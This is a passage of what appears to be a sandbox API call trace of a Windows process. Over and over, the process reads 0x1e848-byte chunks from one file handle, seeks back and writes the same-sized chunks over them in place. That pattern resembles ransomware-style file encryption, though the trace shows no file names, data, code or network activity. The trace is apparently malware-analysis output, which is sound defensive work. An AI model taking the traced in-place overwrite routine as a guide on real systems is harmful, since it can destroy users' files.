lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.246] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4bd12e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.246] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.247] GetProcessHeap () returned 0x500000 [0118.247] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.247] GetProcessHeap () returned 0x500000 [0118.247] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.247] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4c0e370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.247] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.265] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4c0e370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.265] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.266] GetProcessHeap () returned 0x500000 [0118.266] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.266] GetProcessHeap () returned 0x500000 [0118.266] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.266] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4c4b400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.266] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.280] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4c4b400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.280] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.281] GetProcessHeap () returned 0x500000 [0118.281] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.281] GetProcessHeap () returned 0x500000 [0118.281] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.281] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4c88490, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.281] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.292] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4c88490, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.292] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.293] GetProcessHeap () returned 0x500000 [0118.293] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.293] GetProcessHeap () returned 0x500000 [0118.293] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.293] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4cc5520, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.293] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.302] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4cc5520, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.302] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.303] GetProcessHeap () returned 0x500000 [0118.303] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.303] GetProcessHeap () returned 0x500000 [0118.303] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.303] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4d025b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.303] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.324] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4d025b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.324] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.325] GetProcessHeap () returned 0x500000 [0118.325] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.325] GetProcessHeap () returned 0x500000 [0118.325] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.325] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4d3f640, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.325] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.349] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4d3f640, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.349] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.350] GetProcessHeap () returned 0x500000 [0118.350] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.350] GetProcessHeap () returned 0x500000 [0118.350] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.350] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4d7c6d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.350] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.360] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4d7c6d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.360] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.361] GetProcessHeap () returned 0x500000 [0118.361] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.361] GetProcessHeap () returned 0x500000 [0118.361] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.361] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4db9760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.361] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.370] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4db9760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.370] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.371] GetProcessHeap () returned 0x500000 [0118.371] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.371] GetProcessHeap () returned 0x500000 [0118.371] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.371] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4df67f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.371] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.093] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4df67f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.093] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.094] GetProcessHeap () returned 0x500000 [0119.094] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.094] GetProcessHeap () returned 0x500000 [0119.094] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.094] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4e33880, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.094] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.119] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4e33880, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.119] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.119] GetProcessHeap () returned 0x500000 [0119.120] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.120] GetProcessHeap () returned 0x500000 [0119.120] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.120] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4e70910, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.120] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.130] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4e70910, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.130] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.131] GetProcessHeap () returned 0x500000 [0119.131] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.131] GetProcessHeap () returned 0x500000 [0119.131] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.131] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4ead9a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.131] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.199] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4ead9a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.199] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.200] GetProcessHeap () returned 0x500000 [0119.200] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.200] GetProcessHeap () returned 0x500000 [0119.200] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.200] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4eeaa30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.200] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.218] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4eeaa30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.218] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.221] GetProcessHeap () returned 0x500000 [0119.221] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.221] GetProcessHeap () returned 0x500000 [0119.221] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.221] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4f27ac0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.221] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.296] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4f27ac0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.296] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.297] GetProcessHeap () returned 0x500000 [0119.297] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.297] GetProcessHeap () returned 0x500000 [0119.297] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.297] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4f64b50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.297] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.339] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4f64b50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.340] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.340] GetProcessHeap () returned 0x500000 [0119.340] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.340] GetProcessHeap () returned 0x500000 [0119.340] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.340] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4fa1be0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.340] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.396] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4fa1be0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.396] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.397] GetProcessHeap () returned 0x500000 [0119.397] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.397] GetProcessHeap () returned 0x500000 [0119.397] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.397] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4fdec70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.397] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.459] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4fdec70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.459] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.460] GetProcessHeap () returned 0x500000 [0119.460] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.460] GetProcessHeap () returned 0x500000 [0119.460] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.460] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x501bd00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.460] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.486] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x501bd00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.486] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.486] GetProcessHeap () returned 0x500000 [0119.486] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.486] GetProcessHeap () returned 0x500000 [0119.486] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.486] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5058d90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.487] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.496] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5058d90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.496] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.497] GetProcessHeap () returned 0x500000 [0119.497] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.497] GetProcessHeap () returned 0x500000 [0119.497] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.497] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5095e20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.497] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.723] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5095e20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.723] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.724] GetProcessHeap () returned 0x500000 [0119.724] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.724] GetProcessHeap () returned 0x500000 [0119.724] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.724] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x50d2eb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.724] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.842] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x50d2eb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.842] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.843] GetProcessHeap () returned 0x500000 [0119.843] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.843] GetProcessHeap () returned 0x500000 [0119.843] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.843] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x510ff40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.843] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.861] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x510ff40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.862] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.862] GetProcessHeap () returned 0x500000 [0119.862] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.862] GetProcessHeap () returned 0x500000 [0119.862] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.862] SetFilePointerEx (in: hFile=0x220, 